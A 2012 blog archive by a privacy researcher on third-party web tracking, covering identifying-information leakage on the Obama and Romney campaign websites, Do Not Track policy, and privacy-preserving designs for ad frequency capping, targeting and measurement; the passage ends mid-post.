Supreme Court of the United States Opinions: ZIP (348 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

1. Michael J. Bommarito II & Daniel M. Katz, A Mathematical Approach to the Study of the United States Code, 389 Physica A 4195 (2010), available at http://www.sciencedirect.com/science/article/pii/S0378437110004875.
2. Daniel E. Ho & Kevin M. Quinn, Did a Switch in Time Save Nine?, 2 J. Legal Analysis 69 (2010), available at http://jla.oxfordjournals.org/content/2/1/69.full.pdf.
3. Matthew Sag, Predicting Fair Use, 73 Ohio St. L.J. 47 (2012), available at http://moritzlaw.osu.edu/students/groups/oslj/files/2012/05/73.1.Sag_.pdf.
4. Mihai Surdeanu et al., Risk Analysis for Intellectual Property Litigation, Proc. 13th Int’l Conf. on Artificial Intelligence & L. 116 (2011), available at http://dl.acm.org/citation.cfm?id=2018375.

Presidential Identifying Information

jonathan — Thu, 01 Nov 2012 15:59:59 +0000

Sunday’s New York Times included a story about how the presidential campaigns are making extensive use of third-party web trackers. In response to privacy concerns, “[o]fficials with both campaigns emphasize[d] that [tracking] data collection is ‘anonymous.’”¹

The campaigns are wrong: tracking data is very often identified or identifiable. Arvind Narayanan has previously written a comprehensive and accessible explanation of why web tracking is hardly anonymous; my survey paper on web tracking provides more extensive discussion.

One of the ways in which web tracking data can become identified or identifiable is “leakage”—data flowing to trackers from the websites that users interact with. Leakage most commonly occurs when a website includes identifying information in a page URL or title. Embedded third parties receive the identifying information if they receive the URL (e.g. referrer headers) or the title (e.g. document.title). Even a little identifying information leakage thoroughly undermines the privacy properties of web tracking: once a user’s identity leaks to a tracker, all of the tracker’s past, present, and future data about the user becomes identifiable.

Web services frequently fail to account for information leakage in their design and testing; a study I conducted last year found that over half of popular websites were leaking identifying information.² More than a few website operators have made inaccurate representations about the information they share with third parties; in just the past year the Federal Trade Commission settled deception claims against both Facebook and Myspace for falsely disclaiming identifying information leakage.

The Times coverage piqued my curiosity: Are the campaigns identifying their supporters to third-party trackers? Are they directly undermining the anonymity properties that they are so quick to invoke?

Yes, they are. I tested the two leading candidate websites using the methodology from my prior study of identifying information leakage. Both leak. The following sections describe my observations from the Barack Obama and Mitt Romney campaign websites.

Barack Obama

Username. Several pages include the username in their URL or title, including the user preferences page, the social organizing “Dashboard” profile page, the Dashboard profile editing page, and the Dashboard personal statistics page.³





A sample of pages that include the username in their URL or title.

In my testing, username leaked to ten companies.⁴

A username is often personally identifying. It might simply be a user’s name, or it could enable linking other public accounts and information about the user. Several companies have already deployed effective username linkage in their products.

The default username selection on barackobama.com facilitates identifying users. If the user registers with a Facebook account, the username defaults to the user’s name in dot-separated format (e.g. leland.stanford). If the user signs up with just an email address, the default username is the first part of the user’s email address—which will often be some form of the user’s name or a fanciful username shared with other services.

The design of the Dashboard website also enables connecting a username to a user’s identity. Any signed-in user (including someone trying to identify tracking data) can look up a user’s profile from their username. Unless a user opts out, their profile page will include their name.



Left: Logged-in view of another user’s Dashboard profile page.
Right: Option to display last initial instead of last name on the user’s profile page.
Name. The title of the Dashboard profile page incorporates the user’s name. A script on the page reports impression information to Chartbeat, including the page title.⁵

A user’s Dashboard profile page.
Street Address and ZIP Code. If a user searches for an organizing team in Dashboard, the results page includes the query street address and ZIP code in its URL. It appears new Dashboard users are required to search for a team.

Left: Dashboard landing page.
Right: Searching for a team in Dashboard.

Similarly, the results page for finding an event includes the query ZIP code in its URL.

Searching for an event.

I spotted the street address and ZIP code leaking to nine companies, and just the ZIP code leaking to one other company.⁶

Mitt Romney

Name. The post-login landing page and most preference pages include the user’s name in their title.

A post-login landing page (email signup) and a sample of preference pages.

Scripts from two companies collect the page title as part of their impression reporting.⁷
Partial Email Address. If a user registers with their Facebook account, the post-login landing page URL incorporates the first part of the user’s email address (with non-alphanumeric characters removed).

Mock-up of a post-login landing page (Facebook signup).

Thirteen companies received the partial email address.⁸
User ID. Many pages include a unique user ID in their URL, which leaks to the same companies.⁹

A sample of pages that include the user ID in their URL.

The ID itself is not identifying information, and mittromney.com does not provide social functionality that would facilitate mapping a user ID to a user’s name. It appears, however, that a quirk in mittromney.com can allow anyone (even not logged in) to determine a user’s name from their ID. If the user has recently visited a URL that includes their user ID, anyone who visits that URL in the following (very roughly) fifteen minutes can view the user’s name in the page heading.¹⁰

Logged-out view of a recent user’s profile editing page.

A tracker could identify users by waiting for them to land on one of these URLs, then visiting it and extracting the user’s name. Alternatively, anyone in possession of tracking data could periodically test these user ID URLs.

ZIP Code. The results page for an events search includes the query ZIP code in its URL.¹¹

Results page for an events search.

The ZIP code leaked to the same companies as the partial email address and user ID.

Takeaways

The major presidential campaigns both fell short of best practices in their website design and testing, and they both misrepresented their privacy practices to the Times. The Gray Lady also deserves a light rap on the knuckles for insufficiently scrutinizing the campaigns’ anonymity assertions.

But, in my view, the greatest takeaway is that the myth of web tracking’s anonymity has proven remarkably resilient—despite compelling research results and practical experience to the contrary. Companies and trade groups in the tracking business community frequently invoke unfounded claims of anonymity. Policymakers, website operators, and journalists all-too-often repeat those claims—even, apparently, when they’re of the highest caliber.

My hope is that this episode serves as a learning opportunity and a reminder: there is no such thing as anonymous web tracking.

Thanks to Ed Felten and Arvind Narayanan for valuable comments on a draft. All errors are solely my own.

1. An Obama campaign spokesman went even further, asserting “[w]e do not provide any personal information to outside entities.” The barackobama.com privacy policy disclaims responsibility for third-party data collection. The mittromney.com privacy policy reserves unfettered discretion to share information with third parties. Strangely, it also includes a provision about “opt[ing] out from our cookies” and other information collected by the website—and then provides a link to opt out of Google’s third-party advertising cookies.

2. Balachander Krishnamurthy, Craig Wills, and colleagues conducted the seminal studies of identifying information leakage (1, 2, 3, 4, 5).

3. For example, respectively, https://www.barackobama.com/account/robber.baron, https://dashboard.barackobama.com/people/robber.baron, https://dashboard.barackobama.com/people/robber.baron/edit, and https://dashboard.barackobama.com/people/robber.baron/numbers.

4. The companies were: Akamai (CDN used by Chartbeat), Amazon (Amazon Web Services used by the campaign and New Relic), BrightTag, Chartbeat, Facebook, Google (Analytics, DoubleClick, and Hosted Libraries), Hoefler & Frere-Jones (typography.com), New Relic, Think Realtime, and Zendesk. Here and throughout this post I err on the side of comprehensiveness in listing third parties that receive data. Opinions differ on the privacy risks associated with various service providers (e.g. Akamai, Amazon Web Services, and Google Analytics). My intent is not to take a position on that issue, but rather, convey sufficient information to satisfy readers across the spectrum of views.

5. The page title might be, for example, Dashboard - Leland Stanford. The Chartbeat script would report back with a URL like https://ping.chartbeat.net/ping?...i=Leland%Stanford%20-%20Dashboard....

6. The results page for a Dashboard teams search has a URL formatted like https://dashboard.barackobama.com/teams/match?street=353+Serra+Mall&zip=94305.... The results page URL for an events search has a format like https://my.barackobama.com/page/event/search_results?...zip_radius%5B0%5D=94305. I observed the street address and ZIP code leak to: Akamai (CDN used by Chartbeat), Amazon (Amazon Web Services used by the campaign and New Relic), Chartbeat, Facebook, Google (Analytics), Hoefler & Frere-Jones (typography.com), New Relic, Optimizely, and Zendesk. ZIP code also leaked to BrightTag and Google (Maps API).

7. The post-login landing page title has the form Leland Stanford | Mitt Romney for President. A ShareThis script reports back to a URL like https://l.sharethis.com/pview?...title=Leland%Stanford%20%7C%20Mitt%20Romney%20for%20President..., and a Syncapse script contacts a URL like https://cn.clickable.net/?...title=Leland%20Stanford%20%7C%20Mitt%20Romney%20for%20President....

8. An example post-login landing page URL for a Facebook user: https://www.mittromney.com/users/lelandstanford. The thirteen companies who received the first portion of the user’s email address were: Adobe (Typekit), Akamai (hosting used by the campaign), Amazon (Amazon Web Services used by New Relic and Search Discovery), Compete, comScore (Scorecard Research), Facebook, Google (Ad Services and DoubleClick), Lotame, New Relic, Optimizely, Search Discovery, ShareThis, and Syncapse.

9. No matter how a user registers, many pages include a unique user ID in their URL. A preferences page, for example, might have the URL https://www.mittromney.com/user/123456789/edit. If the user signs up without a social network login, the post-login landing page has the generic URL https://www.mittromney.com/user. If the user signs up with a Facebook or Twitter account, however, the landing page URL also includes a unique user ID—but assigned with a different scheme. The Facebook ID allocation system is discussed above; Twitter post-login URLs take the form https://www.mittromney.com/users/12345.

10. My best hypothesis is that this property arises from a caching misconfiguration; page content is correctly dynamic between users, but page headings are incorrectly cached for a period independent of user permissions.

11. Thanks to Natasha Singer for identifying ZIP code leakage on mittromney.com.

The Trouble with ID Cookies: Why Do Not Track Must Mean Do Not Collect

jonathan — Fri, 10 Aug 2012 19:00:50 +0000

Original at the Stanford Center for Internet and Society.

Co-authored by Arvind Narayanan.

The debate over the meaning of Do Not Track has raged for well over a year now. The primary forum is the W3C Tracking Protection Working Group, with frequent sparring in the press and capitals worldwide. There are, broadly, two Do Not Track proposals: one chiefly backed by the ad industry, and another advanced by privacy advocates [1]. These proposals reflect vastly different visions for Do Not Track with vastly different practical consequences. The two sides have unsurprisingly been at loggerheads, with scant movement towards resolution of the key issues.

The ad industry position is, and has been for over a decade, that data collection and retention should be largely unfettered so long as they are associated with a permitted business use [2]. At present these permitted-use exceptions totally swallow the rule, in practice barring little more than behavioral advertisement targeting (1, 2). (Critics often deride the status quo as “Do Not Target.”) A recent proposal by Yahoo! would add, in our view, only modest transparency requirements to the industry position.

But suppose the advertising industry were to meaningfully tighten its permitted uses and retention periods. Would privacy advocates, academics, and policymakers continue to object?

Yes. The industry approach to Do Not Track entirely misses the most serious privacy concerns associated with tracking, including:

Sensitive information. A user’s browsing history can include remarkably sensitive information, such as medical conditions and financial challenges (e.g. 1, 2). Individual users are often identified or easily identifiable (1, 2, 3).

Lack of consumer control. Users are generally unaware of who’s tracking them and how. Existing consumer control tools are difficult to discover and use, and they vary significantly in effectiveness.

Lack of market pressure. Since consumers are unaware of and lack control over tracking, third-party websites are under limited pressure to implement adequate security and privacy protections. Furthermore, many third parties are small, young, growth-oriented companies; security and privacy are not priorities.

Surveillance. Government requests for data stored in the cloud are becoming a regular occurrence, and many companies hand over data in response to such requests without informing users. If ad companies’ claims about the inferential power of tracking data are correct, then the potential for surveillance is correspondingly worrisome.

A toughened version of the industry’s position would also have significant practical shortcomings.

Fragile. Many systems are configured for comprehensive logging by default. It takes only the slightest oversight to begin unintentionally amassing data.

Unverifiable. There is no straightforward way to externally test whether a company is limiting its information retention and use [3].

Lock-in. As the online economy and its technology infrastructure change, use-based definitions are likely to become dated. A rigid use-based approach could lock in current advertising business practices, stifling innovation, or motivate some companies to bend the rules and justify tracking for an ever-expanding set of uses.

The privacy advocates’ definition of Do Not Track takes a much different tack: it would allow (just about) any third-party business practice, so long as it does not impose the privacy risk of collecting a user’s browsing history. A cookie that remembers a language preference would be allowed, for example, while a unique ID cookie would not be allowed [4].

The advocates’ solution avoids the shortcomings of the ad industry approach, and is particularly elegant for two reasons.

Privacy-preserving alternatives. There are simple technological solutions to implement most or all current advertising ecosystem functionality, as we have detailed in the “Tracking Not Required” series (overview talk, frequency capping, behavioral targeting, measurement). Shifting to these architectures would involve switching costs, and in some use cases they would underperform current implementations. That said, we believe it’s quite reasonable for ad companies to incur these minor burdens in exchange for the significant privacy benefits.

Verifiable. Tracking carried out in violation of this interpretation of DNT is externally detectable. This is a crucial point. Some tracking techniques store a unique ID in a user’s device (“supercookies”); others read attributes from a user’s device that, in combination, become unique (“fingerprinting”). Both approaches require accessing browser functionality in a manner that is, in principle, detectable.

It would also be detectable in practice — a “Web Privacy Measurement” community has sprung up that has the tools and motivation to police the web for DNT violations. Automated external detection will never achieve 100% accuracy, but it has proven highly effective at flagging possible privacy-violating information flows for manual inspection by analysts. In the worst case, it provides a basis of suspicion for regulators to conduct audits, whereas with the use-based approach audits would essentially have to be conducted blindly. As long as there is a significant chance that violators will be caught, external policing will have a strong deterrent effect. Companies will be both disincentivized from intentionally gaming DNT and incentived to institutionalize practices that ensure compliance [5].

In conclusion, the Do Not Track negotiations are nearing an impasse, while third-party tracking continues at unprecedented scale. If advertising companies and other third parties don’t step up to the plate, browser vendors and regulators will likely turn to heavy-handed alternatives. We reiterate our belief that a collection-based definition of Do Not Track combined with a deployment of client-side functionality is the ideal outcome for all stakeholders.

[1] The proposal is co-authored by Jonathan Mayer who is also one of the authors of this post.

[2] The paper “Third-Party Web Tracking: Policy and Technology” includes an expanded explanation of industry self-regulatory initiatives.

[3] This CMU Cylab study is one of many demonstrating widespread non-compliance with stated policies.

[4] Protocol information (including IP address and User-Agent string) could still be collected and retained for a short duration. This assuredly introduces some privacy risk, but it is much lesser than the risk associated with long-term retention of uniquely identifying information.

[5] Some smaller players, especially those located in jurisdictions where there is no potential legal liability for non-compliance, might simply ignore DNT. The dynamics of the online advertising market mitigate the privacy risks associated with these companies; reputable first-party websites are unlikely to deploy these services. Furthermore, some technical countermeasures (i.e. blocking) are possible against non-compliant companies. The more privacy-forward browser vendors might even choose to enable countermeasures by default.

Tracking Not Required: Advertising Measurement

jonathan — Tue, 24 Jul 2012 19:38:36 +0000

Co-authored by Arvind Narayanan.

Measurement is central to online advertising: it facilitates billing, performance measurement, targeting decisions, spending allocation, and more. In a pair of earlier posts we explained how advertisement frequency capping and behavioral targeting are achievable without compiling a user’s browsing history. This post similarly proposes practical, privacy-improved approaches to advertising measurement.

There are, broadly, three advertising events that might require measurement.

Impression. An advertisement is displayed to a user. Measured details might include the webpage the ad was served on, the time the ad was served, the user’s location, and the user’s browser.¹

Click. The user clicks the ad.

Action. After viewing the ad, the user later does something on a different webpage. For example, the user might buy the product or service that was advertised. An action may occur days or weeks after an impression.

Sometimes advertisers pay per impression (“CPM” billing), sometimes per click (“CPC”), sometimes per action (“CPA”), and sometimes for a combination of these events (“hybrid”).

The following sections explain how to conduct a privacy-improved measurement of each advertising event.

Impression

When a user’s browser loads an advertisement, the company serving the ad ordinarily learns the URL of the current webpage,² as well as the user’s IP address and User-Agent string.³ Practical, privacy-improved impression measurement is a granularity problem: How can a website generalize the impression data it collects without substantially compromising the utility of that data?

Requirements will undoubtedly vary by service. We present here a rough design spectrum of the information that a third-party website might retain.⁴

Information Current Approach Better Approach Even Better Approach

Webpage URL Fully qualified domain name Public suffix + 1

Time Precise timestamp Day Week

User Location IP address Truncated IP address Coarse geolocation

Browser User-Agent string Browser/OS major versions Browser/OS

Click

Click measurement is exactly the same as impression measurement, with just one extra piece of information: whether the user clicked the ad.⁵

Action

Action measurement is a more difficult engineering problem. An ad impression is, for measurement purposes, a one-shot event: it occurs within the context of a single webpage. Measuring an action, on the other hand, requires linking an ad impression on one webpage with a subsequent action on another webpage.⁶

A pairing of client-side storage and selective information disclosure can enable privacy-improved action measurement, much like our previous approaches to frequency capping and behavioral targeting. When an ad is displayed, information about the impression can be stored in the browser. If the user later completes an action, the ad company can query the browser for relevant impression information.

Implementing a prototype of our action measurement algorithm was straightforward using HTML 5 local storage. Source is available on GitHub. Performance is a non-issue, as with our prototypes for frequency capping and behavioral targeting.

Many advertising companies also record whether this was a first-time (“unique”) impression. Our algorithm for frequency capping can be trivially modified to provide this functionality. ↩

Third-party websites usually learn the first-party webpage URL from a Referer header or explicit Request-URI parameter. There are some methods for a first-party webpage to hide its URL from third-party content, including iframe sandboxing and the HTML 5 noreferrer link annotation. For the moment, these techniques are not sufficiently simple, comprehensive, or supported to anticipate widespread use. ↩

A semi-trusted intermediary or anonymizing network could conceal or generalize a user’s IP address, User-Agent string, and other information. See Adnostic and Privad for examples. These approaches are, at present, not practical for broad deployment. ↩

Present Do Not Track proposals diverge on impression measurement; some would allow current approaches to continue, while others would require quickly generalizing impression data. ↩

Do Not Track would allow the current approach to click measurement since the user has (somewhat constructively) interacted with content from the advertising company. ↩

Because of this property, some Do Not Track proposals would require a privacy-improved approach to action measurement. ↩

Do Track: Browser-Based Do Not Track Exceptions

jonathan — Mon, 02 Jul 2012 07:54:14 +0000

Users hold widely varying preferences on web tracking.¹ Some don’t mind the practice. Some object to it entirely. Many trust certain organizations to follow them around the web.

Do Not Track accomodates these divergent preferences in two ways. First, browsers and other user agents include an option for universally signaling a preference against tracking (“DNT: 1”). Firefox, Internet Explorer, and Safari have all integrated this feature, and Chrome will support it by the end of the year. Second, a user can configure exceptions to the universal signal. Some websites may choose to build a proprietary “out-of-band” exception mechanism, using ordinary web technologies, that trumps the “DNT: 1” signal. The Do Not Track Cookbook includes an example of how a Facebook out-of-band exception mechanism might appear.

The W3C Do Not Track standard will provide another option: a simple JavaScript interface that allows a website to request an exception, paired with a signal that some tracking is allowed (“DNT: 0”).

There are many benefits to managing Do Not Track exceptions through the browser.

Avoids Duplication of Effort. Browser vendors implement an exception mechanism once. Websites can then take advantage of the mechanism with just a few lines of code.
Persistence. A user is unlikely to accidentally clear browser-based exceptions, in contrast to cookies and other out-of-band exception storage mechanisms.²
Centralized Management. Users can adjust all their Do Not Track preferences in one place. Out-of-band exceptions might be scattered across the web.³
Consistent User Interface. The Do Not Track exception user interface will be the same across sites and integrated into the browser’s privacy controls.
Design Quality. Browser vendors employ some of the brightest minds in user interface design.
Usability Incentives. Web browsers compete on usability and frequently iterate with user interface improvements. Browser development teams are, for the most part, incentivized to provide users with adequate information about and control over a Do Not Track exception. A website that seeks a Do Not Track exception, on the other hand, is incentivized to push the boundaries of acceptable notice and choice to get that exception.⁴

In order to better understand the technical challenges associated with browser-based Do Not Track exceptions, I implemented a prototype as a Firefox add-on.

Example exception requests.

A centralized preference management interface.

The source is available on GitHub. I want to emphasize that this is a prototype: it does not conform to the current W3C specification draft and it is insecure, buggy, and slow.

I learned several lessons from the project.

Browser-based exceptions are not very difficult to implement. The Firefox prototype required only a couple days of straightforward development.
Browser-based exceptions are markedly more difficult to implement than the “DNT: 1” header. As a very rough comparison, my reference “DNT: 1” Chrome extension is 9 lines of code, while my prototype Firefox exceptions extension is already 521 lines. Furthermore, implementing “DNT: 1” is largely a systems engineering project, while an exception mechanism necessitates both systems and user interface effort.
The Do Not Track exception user interface is hard to get right. After several iterations, the user interface in my prototype still leaves much room for improvement. I expect Do Not Track will, like other browser features, benefit from long-term user interface evolution.

The prototype add-on validates what Do Not Track proponents have long recognized: Do Not Track is not a crude on/off switch. Rather, it begins a conversation between websites and users about privacy preferences. Browsers will play a central role in facilitating that conversation.

Thanks to Arvind Narayanan for comments on a draft.

1. A number of surveys have reflected mixed consumer preferences on web tracking. See, e.g., Pew Internet 2012, TRUSTe/Harris Interactive 2011, USA Today/Gallup 2010, McDonald and Cranor 2010, and Turow et al. 2009.

2. If a website maintains user accounts, associating an out-of-band exception with an account can greatly reduce the risk of accidental clearing.

3. This problem could be somewhat mitigated with a browser scripting interface for registering an out-of-band exception mechanism. I proposed the approach last year, and there was renewed interest at a recent W3C working group meeting.

4. See Leon et al. 2011 for a usability analysis of current online advertising user control mechanisms.

Tracking Not Required: Behavioral Targeting

jonathan — Mon, 11 Jun 2012 21:42:59 +0000

Original at 33 Bits of Entropy.

Co-authored by Arvind Narayanan and Subodh Iyengar.

In the first installment of the Tracking Not Required series, we discussed a relatively straightforward case: frequency capping. Now let’s get to the 800-pound gorilla, behaviorally targeted advertising, putatively the main driver of online tracking. We will show how to swap a little functionality for a lot of privacy.

Admittedly, implementing behavioral targeting on the client is hard and will require some technical wizardry. It doesn’t come for “free” in that it requires a trade-off in terms of various privacy and deployability desiderata. Fortunately, this has been a fertile topic of research over the past several years, and there are papers describing solutions at a variety of points on the privacy-deployability spectrum. This post will survey these papers, and propose a simplification of the Adnostic approach — along with prototype code — that offers significant privacy and is straightforward to implement.

Goals. Carrying out behavioral advertising without tracking requires several things. First, the user needs to be profiled and categorized based on their browsing history. In nearly all proposed solutions, this happens in the user’s browser. Second, we need an algorithm for selecting targeted ads to display each time the user visits a page. If the profile is stored locally and not shared with the advertising company, this is quite nontrivial. The final component is for reporting of ad impressions and clicks. This component must also deal with click fraud, impression fraud and other threats.

Existing approaches

The chart presents an overview of existing and proposed architectures.

“Cookies” refers to the status quo of server-side tracking; all other architectures are presented in research papers summarized in the Do Not Track bibliography page. CoP stands for “Client-only Profiles,” the architecture proposed by Bilenko and Richardson.

Several points of note. First, everything except PrivAd — which uses an anonymizing proxy — reveals the IP address, and typically the User Agent and Referer to the ad company as part of normal HTTP requests. Second, everything except CoP (and the status quo of tracking cookies) requires software installation. Opinions vary on just how much of a barrier this is. Third, we don’t take a stance on whether PrivAd is more deployable than ObliviAd or vice-versa; they both face significant hurdles. Finally, Adnostic can be used in one of two modes, hence it is listed twice.

There is an interesting technological approach, not listed above, that works by exposing more limited referer information. Without the referer header (or an equivalent), the ad server may identify the user but will not learn the first-party URL, and thus will not be able to track. This will be explored in more depth in a future article.

New approach. In the solution we propose here, the server is recruited for profiling, but doesn’t store the profile. This avoids the need for software installation and allows easy deployability. In addition, non-tracking is externally verifiable, to the extent that IP address + User-Agent is not nearly as effective for tracking as cookie-based unique identifiers.[1] Like CoP, and unlike Adnostic, each ad company can only profile users during visits to pages that it has a third-party presence on, rather than all pages.

Profiling algorithm.

1. The user visits a page that has embedded content from the ad company.

2. JavaScript in the ad company’s content sends the top-level URL to a special classifier service run by the ad company. (The classifier is run on a separate domain. It does not have any cookies or other information specific to the user.)

3. The classifier returns a topic classification of the page.

4. The ad company’s JavaScript receives the page classification and uses it to update the user’s behavioral profile in HTML5 storage. The JavaScript may also consider other factors, such as how long the user stayed on the page.

There is a fair degree of flexibility in steps 3 and 4 — essentially any profiling algorithm can be implemented by appropriately splitting it into a server-side component that classifies individual web pages and a client-side component that analyzes the user’s interaction with these pages.

Ad serving and accounting.

The ad serving process in our proposal is the same as in Adnostic — the server sends a list of ads along with metadata describing each ad, and the client-side component picks the ad that best matches the locally stored profile. To avoid revealing which ad was displayed, the client can either download all (say, 10) ads in the list while displaying only one, or the client downloads only one ad, but ads are served from a different domain which does not share cookies with the tracking domain. Note the similarity to our frequency capping approach, both in terms of the algorithm and its privacy properties.

Accounting, i.e., billing the right advertiser is also identical to Adnostic for the cost-per-click and cost-per-impression models; we refer the reader there. Discussing the cost-per-action model is deferred to a future post.

Implementation. We implemented our behavioral targeting algorithm using HTML 5 local storage. As with our frequency capping implementation, we found performance was exceptionally fast in modern desktop and mobile browsers. For simplicity, our implementation uses a static local database mapping websites to interest segments and a binary threshold for determining interests. In practice, we expect implementers would maintain the mapping server-side and apply more sophisticated logic client-side.

We also present a different work-in-progress implementation that’s broader in scope, encompassing retargeting, behavioral targeting and frequency capping.

Conclusion. Certainly there are costs to our approach — a “thick-client” model will always be slightly more inconvenient to deploy and maintain than a server-based model, and will probably have a lower targeting accuracy. However, we view these costs as minimal compared to the benefits. Some compromise is necessary to get past the current stalemate in web tracking.

Technological feasibility is necessary, but not sufficient, to change the status quo in online tracking. The other key component is incentives. That is why Do Not Track, standards and advocacy are crucial to the online privacy equation.

[1] The engineering and business reasons for this difference in effectiveness will be discussed in a future post.

Tracking Not Required: Frequency Capping

jonathan — Mon, 23 Apr 2012 18:00:18 +0000

Co-authored by Arvind Narayanan.

Debates over web tracking and Do Not Track tend to be framed as a clash between consumer privacy and business need. That’s not quite right. There is, in fact, a spectrum of possible tradeoffs between business interests and consumer privacy.

Our aim with the Tracking Not Required series is to show how those tradeoffs are not at all linear; it is possible to swap a little functionality for a lot of privacy. We only use technologies that are already deployed in browsers, and the solutions we propose are externally verifiable.¹

We focus on issues at the center of Do Not Track negotiations in the World Wide Web Consortium. Advertising companies have pledged to stop forms of ad targeting once a user enables Do Not Track, but many maintain that tracking is essential for a litany of “operational uses.” The Tracking Not Required series demonstrates how business functionality can be implemented without exposing users to the risks of tracking.

This first post addresses frequency capping in online advertising, the most frequently cited “operational use” necessitating tracking.

Background

When an online advertiser places a bid, it often sets a “frequency cap” on how many times a user may see a particular ad or ad campaign. Many advertising companies implement frequency capping with a unique ID cookie; when a user loads an ad, the ad company looks up past ad views using the ID and imposes frequency caps. The ID cookie approach is understandable: frequency capping becomes a straightforward database lookup. But ID cookies come at a significant privacy cost: they enable effective tracking of a user’s browsing activities.

Algorithm

When the browser loads a page, for each ad slot:

The advertising company sends a list of ads it is considering for display, including a frequency cap for each ad. The list is ordered by preference.
A script iterates through the list. For each ad in the list, the script checks a local ad viewing history to determine whether the ad is frequency capped. It selects the first ad that is uncapped.
The script sends the uncapped ad back to the ad company for display or entry into an ad exchange auction.

When an ad is displayed:

The script records the impression in the local ad viewing history.
The advertising company bills the ad as usual (per impression, per click, per action,² or a hybrid).

Explanation

Our algorithm leverages several design features to improve the privacy properties of frequency capping.

Client-side storage. The ad company does not store the user’s ad viewing history.
Query-response. Our algorithm shares information only about ads that might be shown, not all ads the user has seen.
Client-side logic. The ad company learns whether certain ads are capped or not; it does not learn their view counts.
Server-side preprocessing. Our algorithm shares only the first uncapped ad, not the capping state of each ad in the list.

Our algorithm protects user privacy by limiting the number of states the browser can be in. When $latex m$ ads are under consideration, our algorithm only allows the browser to be in one of $latex m$ states–each of the ads might be selected as the first uncapped ad.³ The maximum information entropy contributed is $latex log_2 m$ bits.^{4, 5}

The discussion has thus far centered on choosing a single ad. An ad company will often select multiple ads of multiple formats when populating a page. The associated maximum information entropy is $latex sum_{i=0}^{k}{log_2{m_i choose n_i}}$ for a page with $latex k$ ad formats, where $latex m_i$ is the number of ads considered in the $latex i$th format and $latex n_i$ is the number of ads selected in the $latex i$th format.

For a concrete example, consider a New York Times article page, which often features a banner graphical ad, a sidebar graphical ad, and two footer text ads. If there are three ad formats and five possible ads for each format, an ad network that populates all four slots would gain at most 7.97 bits of information entropy from frequency capping. In other words, the ad network cannot learn more about the average user than if it had set a one-character cookie!

Implementation

Several advertising companies have objected that privacy-preserving frequency capping is not feasible in implementation. We respectfully disagree.

Performance is a non-issue. Our algorithm imposes negligible requirements on browser storage⁶ and computation.⁷ As for network latency, the approach would at most require an additional roundtrip–and for the many ad companies that already load an ad over multiple roundtrips, it wouldn’t necessitate any extra roundtrip.

There would, of course, be some software engineering required for implementation. The necessary scripting is straightforward; we developed a prototype implementation of our algorithm in hours. (Source is available on GitHub.) Backend changes may be more demanding; ad companies would have to shift from selecting particular ads for display to generating preference-ordered lists of possible ads. While assuredly not trivial, we do not see how the engineering would be unusually complicated.

1. A website’s compliance with our proposals could be externally verified in a number of ways, such as with an automated auditing tool (e.g. FourthParty), through use of a trusted implementation, or by an independent auditing firm.

2. Privacy-preserving per-action and hybrid billing can be accomplished by querying the impression history in local storage when a billable action occurs.

3. We assume here that at least one ad is uncapped, and we assume in the later discussion that at least $latex n_i$ ads are uncapped. One way to guarantee those assumptions is to designate certain ads as fallbacks. If those assumptions do not hold, the maximum information entropy is $latex log_2 left(m+1right)$ bits for a single format, single ad selection and $latex sum_{i=0}^{k}{log_2{sum_{j=0}^{n_i}{m_i choose j}}}$ bits for multiple format, multiple ad selection.

4. This property follows from the Gibbs inequality. The information entropy is $latex log_2 m$ bits only if users are evenly distributed across the state space. Where the state space is dynamic and the distribution of users among states is skewed, both of which are very likely to occur with the approach we propose, the information entropy will be significantly less than $latex log_2 m$ bits.

5. We analyze our algorithm for marginal privacy impact, that is, the extent to which it makes user privacy worse off. IP address and User-Agent already contribute substantial information entropy and allow tracking many users.

6. For example, if an ad is represented by a 4 byte identifier and frequency count is stored in 1 byte, frequency caps for 100,000 ads consume merely 500 KB. HTML 5 local storage can hold at least 5 MB in the major browsers; Indexed Database and Web SQL can store even more.

7. In our testing, modern browsers can perform dozens of lookups in an HTML 5 local storage instance with over 100,000 keys in mere milliseconds.

Third-Party Web Tracking: Policy and Technology

jonathan — Tue, 13 Mar 2012 12:30:27 +0000

John Mitchell and I have written a new paper that synthesizes research on policy and technology issues surrounding third-party web tracking. It will appear at the IEEE Symposium on Security and Privacy in May.

Abstract

In the early days of the web, content was designed and hosted by a single person, group, or organization. No longer. Webpages are increasingly composed of content from myriad unrelated “third-party” websites in the business of advertising, analytics, social networking, and more. Third-party services have tremendous value: they support free content and facilitate web innovation. But third-party services come at a privacy cost: researchers, civil society organizations, and policymakers have increasingly called attention to how third parties can track a user’s browsing activities across websites.

This paper surveys the current policy debate surrounding third-party web tracking and explains the relevant technology. It also presents the FourthParty web measurement platform and studies we have conducted with it. Our aim is to inform researchers with essential background and tools for contributing to public understanding and policy debates about web tracking.

The FTC’s Chairman Groks Do Not Track

jonathan — Wed, 29 Feb 2012 11:00:20 +0000

Last Thursday the White House hosted a major event on online privacy. Much of the public attention focused on a long-awaited White House report and a commitment by an online advertising self-regulatory group to implement components of the Do Not Track technology. Both the Electronic Frontier Foundation and the Center for Democracy and Technology have written detailed reviews of what transpired.

There has been scant focus on Federal Trade Commission Chairman Jon Leibowitz’s brief remarks on Do Not Track. That’s a mistake.

The FTC was an early, vocal proponent of Do Not Track with its December 2010 preliminary staff report on online privacy. FTC staff have frequently cajoled companies and trade groups to implement Do Not Track, and they have participated in every meeting of the World Wide Web Consortium’s Do Not Track working group. Chairman Leibowitz himself attended a recent meeting in Brussels.

The FTC’s thinking matters. The agency can—and does—bring enforcement actions against web trackers (e.g. Chitika, ScanScout) and the websites that facilitate them (e.g. Facebook). The FTC can call for Do Not Track legislation. Further, under the new White House proposal, the agency would be vested with both veto power over self-regulatory codes and enforcement authority for baseline privacy requirements.

FTC commissioners tend to shy from staking out their individual policy views. The FTC is a law enforcement agency, and it only “speaks” through a vote of the commission. Chairman Leibowitz in particular has relied on subtlety and nuance in his policy addresses.

Last Thursday’s speech was unusually direct. Chairman Leibowitz gave the clearest articulation yet of his thinking on Do Not Track—and he got it completely right. Here’s a summary.

The FTC does policy, not just enforcement. And it’s the agency that will continue to lead on Do Not Track, not the White House or the Commerce Department.

Since our founding in 1914, the FTC also has had a policy function, which has focused recently on privacy.

With the encouragement of this Administration – which has so keenly recognized the link between protecting consumer privacy online and engendering consumer trust in Internet commerce – an impressive public-private partnership has made a beginning, coming together around one small agency’s Do Not Track initiative.

A consumer’s Do Not Track preference must do more than stop behavioral ad targeting.

